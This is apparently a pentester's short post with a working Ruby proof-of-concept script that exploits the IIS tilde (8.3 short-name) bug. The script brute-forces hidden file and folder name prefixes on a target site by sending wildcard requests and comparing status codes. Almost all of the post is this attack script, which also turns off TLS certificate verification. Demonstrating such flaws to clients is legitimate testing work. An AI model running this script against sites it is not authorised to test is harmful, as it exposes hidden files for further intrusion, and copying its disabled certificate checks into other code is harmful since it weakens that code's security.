During a pentest, I needed to demonstrate the IIS tilde bug to a customer as proof, so I wrote a simple Ruby script for them.
#!/usr/bin/env ruby
# iistidlebugpoc.rb
# quick PoC script for the MS IIS tilde (8.3 short-name) bug
require 'rubygems'
require 'mechanize'
require 'optparse'
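# Flush stdout on every write so progress output appears immediately.
STDOUT.sync = true

# Shared HTTP client used for every request the script sends.
@agent = Mechanize.new
#@agent.ssl_version = 'SSLv3'
# NOTE(review): certificate verification is disabled, so the server's identity
# is never authenticated and an on-path party could alter the status codes this
# script bases its result on. Treat output gathered this way as unauthenticated
# evidence; enable verification wherever the target presents a valid certificate.
@agent.verify_mode = OpenSSL::SSL::VERIFY_NONE

# Parsed command-line options. :errcode is the status code that chk_char
# compares responses against; it defaults to "404" when -e is not given.
# NOTE(review): :verbose is stored but nothing visible in this file reads it.
@options = { errcode: "404" }

parser = OptionParser.new do |opts|
  # Show the real script name instead of a hard-coded placeholder.
  opts.banner = "Usage: #{File.basename($PROGRAM_NAME)} [options]"

  # Base URL; send_req appends its argument directly to this string.
  opts.on('-u', '--url url', 'https://example.com/') do |url|
    @options[:url] = url
  end

  opts.on('-v', '--verbose', 'enable debug output') do
    @options[:verbose] = true
  end

  opts.on('-e', '--errcode errcode', 'define error code') do |errcode|
    @options[:errcode] = errcode
  end

  opts.on('-h', '--help', 'help?') do
    puts opts
    exit
  end
end
parser.parse!

# --url is mandatory: without it send_req would call + on nil and the script
# would die with a NoMethodError instead of a usable message.
if @options[:url].nil? || @options[:url].empty?
  warn parser.help
  exit 1
end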
# Issues a GET for the configured base URL with +data+ appended verbatim.
#
# @param data [#to_s] text appended to @options[:url]
# @return whatever @agent.get returns on success, or the response code
#   carried by Mechanize::ResponseCodeError when the request is rejected
def send_req(data)
  target = @options[:url] + data.to_s
  @agent.get(target)
rescue Mechanize::ResponseCodeError => err
  # Error statuses arrive as exceptions; hand the code back to the caller.
  err.response_code
end
# Tests a single candidate prefix.
#
# Sends +str+ followed by the literal suffix "*~1*/.aspx" through send_req and
# compares the result with the configured error code (@options[:errcode]).
# A match is treated as a hit: the prefix is echoed to stdout and returned.
#
# @param str [String] candidate prefix
# @return [String, nil] +str+ on a match, nil otherwise
def chk_char(str)
  expected = @options[:errcode]
  observed = send_req(str + "*~1*/.aspx")
  return nil unless expected == observed

  # Print a filler, then return to column 0 and overwrite it with the hit.
  print "------"
  print "\r#{str}\n"
  str
end
# Extends every prefix in +list+ by one character and keeps the extensions
# that chk_char accepts.
#
# Candidates are tried in the fixed order of the alphabet below, prefix by
# prefix, so the result preserves that order.
#
# @param list [Array<String>] prefixes accepted so far
# @return [Array<String>] accepted prefixes that are one character longer
def chk_file(list)
  alphabet = "qazwsxedcrfvtgbyhnujmikolp1627384950_- ."
  list.flat_map do |prefix|
    # chk_char yields nil for a miss; compact drops those entries.
    alphabet.each_char.map { |chr| chk_char(prefix + chr) }.compact
  end
end
# Driver: start from the empty prefix and let chk_file extend the surviving
# prefixes by one character per round, for five rounds. Matches are echoed by
# chk_char as they are found; the final list itself is not printed.
puts "Bruteforce filename..please wait"
puts "Error Code : #{@options[:errcode]}"

data = ['']
5.times { data = chk_file(data) }